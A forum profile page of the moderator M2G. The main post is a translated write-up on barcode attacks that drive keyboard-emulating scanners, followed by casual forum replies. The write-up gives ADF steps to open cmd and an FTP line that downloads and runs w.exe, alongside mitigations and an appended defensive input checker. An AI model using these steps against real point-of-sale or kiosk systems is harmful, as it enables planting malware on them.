
M2G

Moderators
  • Posts: 1837
  • Joined
  • Last visited
  • Days Won: 31

Everything posted by M2G

  1. Barcode attack technique (Badbarcode) - Drops virustracker

    Author: 数据流@伏宸安全实验室
    From: http://drops.wooyun.org/tips/12183

    Barcodes are everywhere in our daily life, especially in supermarkets, convenience stores and the logistics industry. However, are they safe? The barcode attack that @Tk described at PacSec and included in his demo video on Twitter was so cool that I bought a scanner for research as well. During my research, I went through all the information I could find, at home and abroad, but none of it covers the possible attack techniques. So here is one.

    Barcodes are graphic identifiers used to represent a set of information by varying the widths and spacings of lines. Common barcodes are parallel lines made up of black bars (abbreviated as bar) and white bars (abbreviated as space) with different reflectivity. Here are several common types of barcode: code39, code128, code93, EAN128, EAN13, QR, etc. Most of them are one-dimensional, except for QR, which is two-dimensional. This post mainly focuses on one-dimensional scanners. Code 128 is the most widely used and supports the most characters. Normally such attacks will exploit code 128 barcodes.

    Almost everyone has seen a barcode scanner in supermarkets, logistics, hospitals and lottery offices. A scanner is used to read the information in a barcode. A conventional one often uses infrared light to do that, and its embedded chip outputs the result after processing. Some popular scanner brands in the world include Symbol, Honeywell and Datalogic. Among them, Symbol has been acquired by Motorola. You'll notice that when you pay the bill at the supermarket, the code of the goods is displayed on the screen after scanning. Actually, many scanners rely on keyboard input, which means a scanner is, in fact, the equivalent of a keyboard. This is a huge risk. Since a scanner is a keyboard, any keyboard data can be entered by manipulating the data in barcodes.

    However, the UPC barcode, for example, only supports numbers, and some may support numbers and letters, while code 128 is widely used because it supports ASCII characters 0-127, which is why it is called code 128. Barcode length is adjustable and may support up to 232 characters. Code 128 can be categorized into 3 groups:

    Code 128A: standard numbers and uppercase letters, control characters, special characters
    Code 128B: standard numbers and uppercase letters, lowercase letters, special characters
    Code 128C/EAN 128: number pairs from [00] to [99], 100 in total, i.e. it can only represent digit strings of even length.

    Code 128 consists of 4 parts: start code, data code, check code (optional) and end code. As shown above, the barcode has parallel lines of different widths and spacings and consists of black lines (bar) and white lines (space). Based on the widths of each line, it can be interpreted as 211214. The first bar consists of two units of vertical lines, while the second space consists of one unit of vertical line, and so on. Normally the first six bars and spaces are a cell. The logic code for 211214 is 11010010000, which is also the start code. Comparison between start codes:

    128A 11010000100
    128B 11010010000
    128C 11010011100

    The end code is always 1100011101011. According to the aforementioned logic code 11010010000, this barcode is a code128-B barcode. In the end, the barcode data can be obtained through analysis based on the encoding table for code128.

    According to the above code128 rule, you may write a program that can read and generate barcodes. But our purpose is to execute some operations. The simplest way is to use control characters. Control characters are non-word characters, such as carriage returns, line feeds and tab characters. In ASCII, 0-31 and 127 are control characters. Based on the ASCII control characters table, almost all Ctrl+? key combinations are included, such as Ctrl+O to open a file, but this is only a local shortcut key combination which can only be used in certain applications, for example in a browser and MS Word. Some of the control characters can be used in some terminals, making the program jump out of the sandbox.

    How do we generate a barcode that makes a computer execute Ctrl+O? Since the above introduces the algorithm for code 128, it's time to write your own program. There are also many small programs on the Internet that can generate barcodes. Here I recommend a powerful barcode editor: BarTender. After installation, click "File"-"New"-"Finish" and there is a blank template. Then click the barcode button to create your barcode and select code 128. Use BarTender to generate a barcode. Characters can be modified and debugged at any time. When scanning the above barcode, the scanner inputs "FutureSec" and outputs Ctrl+O. After scanning, the scanner pops up a dialog box immediately. Almost every scanner can execute it, because code 128 is supported by many scanners.

    Advanced Data Formatting (ADF) is an advanced input method developed by Motorola for scanners, which customizes input data according to rules you set for each step; it can also be viewed as a barcode technique that supports programming. For instance, within a checkout system, when you scan a commodity, since the checkout system is not able to directly process the barcode, this technique is required. Checkout system identifier: A12345, which has to start with an A; data type of the barcode: 12345, pure numbers. In order to be identified by the checkout system, it has to be processed before input. Here is another example: barcode data: 8523647122; output data from ADF: 8523641. How to implement ADF? There aren't any Chinese materials about ADF on the Internet, and only a few appear on some English websites. However, you'll also be confused by @TK's introduction to ADF in his PPT because of the lack of details.

    Later, I found a 300-page ADF guide from Motorola. ADF is a programming method which you may construct based on your needs, and it uses barcodes instead of code for programming. ADF represents all rules using barcodes, such as Prefix/Suffix, Replacement and Character Input.

    Use ADF to hijack data of a scanner

    Before setting up ADF for the scanner, scan the start mode first: Begin new rule. Then the scanned barcode will be added to a rule so long as the logic of the rule is legal. Next scan the following barcodes in order, then save the rule. When the rule is saved, all output data of the scanner will be hijacked as "TEST". If you set ADF, your rule will be executed step by step. How to recover it? Clear all rules with the corresponding barcode.

    Since a command can be executed solely by using control characters, and ADF supports simple programming and more keys, system commands can be easily executed using ADF. ADF supports more keys, for example the most useful one, WIN+R. It is named GUI R in ADF. Since WIN+R is supported, cmd will be executed using the above rule. But this is not enough, because the input is completed by the system, which is faster than human input. When you reach GUI R and execute "c", "m", "d", cmd is already entered before the dialog box for WIN+R pops up. Therefore, a time delay is required, and ADF supports it, which is equivalent to sleep() in programming. When inputting the ADF rule, two Numeric values are entered as the scanning delay, such as 0 and 1, which represent a delay of 0.1 s; 0 and 5 equal 0.5 s; the default value is 1 second. If you know these ADF barcodes, you can construct a cmd popup and use control characters to execute commands, mainly including Enter. But if you do it as described above, it requires as many as 10 barcodes to pop up a cmd box, which means the scanner has to scan 10 times.

    Here is a demo from Tencent Xuan Wu Lab: https://twitter.com/tombkeeper/status/663730674017300480 In the video, we used a pile of barcodes and scanned them 10 times in sequence to get a cmd. This probably relates to the model of the scanner. If it's like this, both rule generation and exploitation will be troublesome. As a matter of fact, this can be optimized by combining the rules of ADF using the scanner software 123scan from Motorola. 123scan is a very powerful scanner management program by Motorola, available on its official website. This software supports multiple functions. The next part is about how to use 123scan to set up ADF. Open it and click "Create new configuration file" -> "My scanner is NOT connected" -> select scanner -> "Modify data" -> "Program complex data modifications" -> "Create a new rule". Click on Add action to add a rule. All ADF rules are included, including Beep control (controls the scanner's buzzer), Replace, etc. Set a 0.5 s delay and add rules in order. Finally, all barcodes will be combined automatically and output. The above is the barcode payload used to execute arbitrary commands. Apart from the first, which restores factory settings, and the second, which clears all rules, it only requires 4 barcodes to execute any single command. "Send All that remains" represents the original data of the barcode after setting up ADF. Here is the ADF process for the above 4 barcodes: input WIN+R -> delay 0.5 s -> input c -> input m -> input d -> input Carriage Return -> delay 0.5 s -> execute contents of the barcode, and the following Send ALL that remains is the command to execute for multi-line commands. If it's a single-line command, 4 barcodes will be enough and Send ALL that remains will not be required.

    Use ADF to plant malware

    Since cmd commands are to be executed, the simplest way is to use ftp to download and execute arbitrary applications. The aforementioned Send ALL that remains can use BarTender to generate FTP commands.

    ftp test«CR»a«CR»a«CR»get w.exe«CR»bye«CR»w.exe«CR»get w.exe«CR»bye«CR»w.exe«CR»

    Next is our demo video, which scanned the ADF settings 4 times. Whatever the barcode is, it executes up to Send All that remains. The video shows how to use FTP commands to execute. (Tested model: Symbol-LS4208-SR20001ZZR) http://v.youku.com/v_show/id_XMTQ0ODY0ODg1Ng==.html?from=y1.7-1.2 Password: wooyun520

    Next is a summary of the possible attack scenarios:

    1. Paying a bill: use a barcode to replace commodities; many convenience stores support WeChat and Alipay barcodes. The scanner supports multiple types of barcodes and can scan the barcodes saved on a cell phone. Some markets are equipped with price query terminals. Use the terminal to scan a special barcode and you'll be able to jump out of the terminal.
    2. Hospital records, test lists: nowadays, the registration at a hospital and medical records both have a barcode. Autonomous terminals in the hospital support the barcode, or you may hand it to a nurse. Almost every hospital has such terminals that can generate a test list by scanning the barcode.
    3. Lottery tickets: lottery tickets have barcodes. The inspecting machine requires the barcode to identify the ticket, so it's possible to forge or attack an inspecting machine; there are many types of lottery terminals.
    4. Express lists: express lists also use barcodes; normally the barcode is code 128 or code 39. Some self-service pickup cabinets may be at risk.

    There are many other scenarios that I won't list here. If possible, I'll find another chance to analyze each scenario.

    Disable the ADF function of the scanner by default. Avoid using keyboard simulation of the scanner. Set up a hotkey blacklist.

    The concept of using barcodes to launch attacks was raised years ago, but no one has dug deep. By using SQL barcodes, it's possible to launch SQL injection, XSS and overflow attacks. Whatever the device, once part of the input can be manipulated, it is risky.

    http://www.appsbarcode.com/code%20128.php
    http://www.slideshare.net/mobile/PacSecJP/hyperchem-ma-badbarcode-en1109nocommentfinal

    Source
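    The post above makes two points that are easy to check in code: how the element widths of a Code 128 symbol map onto the "logic code" that identifies the start character (the 211214 example), and why scanner output has to be treated as untrusted keyboard input. The block below is an added example written for this page, not code from the original article or from any scanner vendor. It expands a width string into modules and classifies the start and stop characters using only the patterns quoted in the post, then vets a decoded scan the way the post's mitigations suggest (strip and report control characters, enforce an expected format). The 8-14 digit product-code pattern and the sample scans are constructed for the example.

    ```python
    import re

    # Code 128 start/stop module patterns as quoted in the post
    # (bar modules written as 1, space modules as 0).
    START_PATTERNS = {
        "11010000100": "A",   # Start A: digits, uppercase, control characters
        "11010010000": "B",   # Start B: digits, uppercase, lowercase
        "11010011100": "C",   # Start C: digit pairs 00..99
    }
    STOP_PATTERN = "1100011101011"   # 4 bars + 3 spaces, 13 modules


    def widths_to_modules(widths):
        """Expand an element-width string such as '211214' into the module
        string the post calls the 'logic code'. Elements alternate
        bar, space, bar, space ... starting with a bar, and every Code 128
        element is 1 to 4 modules wide."""
        modules = []
        for index, digit in enumerate(widths):
            width = int(digit)
            if not 1 <= width <= 4:
                raise ValueError(f"element width {width} is outside 1..4")
            modules.append(("1" if index % 2 == 0 else "0") * width)
        return "".join(modules)


    def identify_code_set(widths):
        """Return 'A', 'B' or 'C' from the first six element widths of a
        barcode, or None if they do not form a Code 128 start character."""
        return START_PATTERNS.get(widths_to_modules(widths[:6]))


    def has_stop_pattern(widths):
        """True if the last seven element widths form the Code 128 stop character.
        Data symbols are six elements each, so the slice starts on a bar."""
        return len(widths) >= 7 and widths_to_modules(widths[-7:]) == STOP_PATTERN


    # --- Treating decoded scanner output as untrusted keyboard input ---

    CONTROL_NAMES = {0: "NUL", 27: "ESC", 127: "DEL"}


    def describe_control(ch):
        """Name a control character the way a keyboard-wedge scanner types it:
        0x0F arrives as Ctrl+O, 0x0D as Ctrl+M (Enter)."""
        code = ord(ch)
        if code in CONTROL_NAMES:
            return CONTROL_NAMES[code]
        return "Ctrl+" + chr(code + 64)   # 1..31 map onto Ctrl+A .. Ctrl+_


    # Constructed format for this example: the application expects a bare
    # 8-14 digit product code and nothing else.
    EXPECTED_FORMAT = re.compile(r"^[0-9]{8,14}$")


    def check_scanner_input(data, expected=EXPECTED_FORMAT):
        """Vet one scan before the application acts on it.
        Returns (accepted, cleaned, findings): control characters are stripped
        and reported, and what remains must match the expected format."""
        findings = []
        kept = []
        for ch in data:
            if ord(ch) < 32 or ord(ch) == 127:
                findings.append(
                    f"control character {describe_control(ch)} (0x{ord(ch):02x})")
            else:
                kept.append(ch)
        cleaned = "".join(kept)
        if not expected.match(cleaned):
            findings.append(f"payload {cleaned!r} does not match expected format")
        return (not findings, cleaned, findings)


    if __name__ == "__main__":
        print(identify_code_set("211214"))            # B, as in the post
        # Constructed scans: the post's "FutureSec" + Ctrl+O, and a plain code.
        for scan in ("FutureSec\x0f", "8523647122"):
            accepted, cleaned, findings = check_scanner_input(scan)
            print(accepted, cleaned, findings)
    ```

    The width-to-module step is the same regardless of symbol; a full decoder would go on to look each 11-module symbol up in the Code 128 table and verify the check character, which the post leaves to the reader. On the defensive side, rejecting rather than silently stripping control characters is the safer choice: a scan that carries Ctrl or Enter keystrokes is evidence of a crafted barcode and is worth logging.
    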
  2. M2G

    RST 2016

    It is available right in the header of every post. MrGrj | Posted 1 minute ago
  3. Anyway, VIP is no longer being granted at the moment, so there is no point in continuing here. Closed.
  4. Welcome! You have a good attitude. Can you give more information about yourself? What do you hope to find here and what is the reason you registered? What knowledge do you have in the IT field (if applicable)?
  5. Please don't start with the soap operas. The theme isn't the only thing we changed on the forum. We'll try to keep it cleaner, so stop the flaming and off-topic. Example: @AGSQ, @ManutaDeAur, @Kronzy and @Meteosensibilul, you were a bit off-topic in your last replies. The report system is very nice here, so if someone "jumps the fence", use it with confidence instead of replying in the thread and ruining the original topic. #numazic
  6. You just have to hover the mouse over the username and the registration date appears too.
  7. If you want some video material, I recommend starting with this: https://www.pluralsight.com/courses/hack-yourself-first It covers some of the biggest web vulnerabilities and shows you how you can exploit them. The guy explains well; I watched a few of them in the past too. You can also download the exercise files and play with the local site yourself. I think you can find it on torrents. If you can't find it, let me know and I'll send it to you. Tip: you can sign up for the conference: https://hacksummit.org/ You'll receive a link by e-mail that lets you create a trial account on Pluralsight for 2 months. That way you can download the materials from there and watch the tutorials without restrictions.
  8. I don't think it's worth trying shady stuff like Basic4Android. You'll probably run into problems and find little support for it. The recommended way is to go native: Java + Android SDK. The next alternative would be Xamarin Studio: https://developer.xamarin.com/guides/cross-platform/application_fundamentals/pcl/ Xamarin supports C#, but from what I've read, you could also write VB.
  9. Breaking news, online news | Stirileprotv.ro @wildchild When Zatarra went to withdraw the money from the ATM, there was someone in front of him who kept trying to enter dots and slashes into the ATM interface. After 5 minutes he gave up. They thought the vulnerability was there. Then it was Zatarra's turn: he scanned the card, entered the PIN and requested a withdrawal of 20 lei. The message "...You have hacked the bank..." appeared, something like that. Someone behind was surprised and was saying something like "look at this guy, he entered 20 as the amount and cracked it. How did he do it? What did he do?" He managed it in 20 seconds while the others were struggling to enter strange characters into the ATM interface.
  10. M2G

    Fun stuff

    Question received by e-mail by one of my colleagues from the client:
  11. When I saw it was on Twitch I thought it would stay recorded. Didn't you record anything so you can send me a link?
  12. M2G

    Useful stuff

    Feynman + the editing is nicely done.
  13. Because it's an event I want to attend, and that's why I liked it. The man said "Like this post if you will join". I wrote to him, not to you. I'd like to attend but I may not be able to, and I have no way of knowing that right now because it doesn't depend only on me. He said the "Like this post" part so he'd know how many are interested, to see whether it's worth holding the presentation. If I liked it and can't be online at that hour, I wanted him to know the reason. That's the nice way. P.S. https://rstforums.com/forum/83838-abuzuri-de-putere-reclamatii-68.rst#post660540 https://rstforums.com/forum/105404-europa-ip-uri-nologine-busybox-post655161.rst#post655161 https://rstforums.com/forum/105457-dctf-gat-ixsesed-adik-haneipot-crd-sau-sa-se-scuze-ie-honeipot.rst#post655293 etc. You have 7 posts of which 6 are totally off-topic and uninteresting. That means approximately 90% of your posts are crap.
  14. I don't know if I'll get home by that time, but I'll join if I do.
  15. I saw the table here and didn't know whether it referred to net or gross salary. I clicked on the article and saw that it doesn't give more details there either. I noticed there are a few asterisks in the table and couldn't see where the information was referenced. I searched a bit and found the source: http://www.brainspotting.ro/wp-content/uploads/2015/10/Brainspotting_ITC_Talentmap_2015-2016.pdf It amazes me how journalists can write an article just by looking at 2 pictures and a table. "Article" is a stretch, since it has 4 paragraphs. At least they wrote the name of the company that did the study, otherwise I had no way to get to the source. PS: The table shows the net salary.
  16. I was at the conference when she presented live. I thought it was a very good talk, especially since she also has public speaking skills and doesn't bore you when she talks. Source
  17. OWASP Cluj is no longer an option, it's sold out.
  18. 24th - 25th of November 2015, Cluj-Napoca. Cluj IT Days: Innovation, entrepreneurship and technologies. Location: Cluj Arena Conference & Multifunctional hall. The IT Days schedule is posted on the site. There will also be interesting workshops. Bonus: 25% discount on the ticket price with the coupon: 2015_ITDAYS (valid until 1 October)
  19. Internet & Mobile World 2015, 7-8 October, Bucharest

    The world as we know it is being shaped by digital as we speak. Its architects are now visionaries, thought leaders and entrepreneurs. They design how all our experiences will look in the future by coming up with new ideas and technologies. Join them at IMWorld 2015 and start shaping the digital future together.

    4 CONTENT STAGES: Main Stage; Business Software & Infrastructure; Developers; Digital Marketing & E-commerce
    5 NETWORKING AREAS: Innovation & Gadgets Area & 4 additional thematic networking points
    4 EXPO AREAS: Business Software & Infrastructure; Online Marketing & E-commerce; International Institutions; Start-ups
  20. How to Web Conference 2015, 26-27 November, Bucharest. It's a conference about entrepreneurship, technology, investments, products etc. I won't go, but I'm posting this so @Zatarra feels good that he has threads in this section.
  21. I received by e-mail a voucher from eMAG worth 20 lei. It's valid until 30 September for purchases of at least 200 RON and it stacks with other discounts. I assume anyone can use it and it isn't something generated only for my account. 3236-3254-0619-0644 Rules here
  22. You need special cookware for induction hobs. Most likely that's the problem. If you turn it on and there's no pot on it, it switches off automatically. Search the net for induction hob cookware if you want to use it (they're quite expensive).
  23. Because the more you know and the wider your horizons are, the more you realize how little you actually know, and that up to that point you weren't super-intelligent but just ignorant.
  24. I have a mug of blueberry wine next to me. I'm too zen to hand out a ban. If we're programmers, we fix the bug. If you're a sysadmin, you removed the faulty component. What's not OK?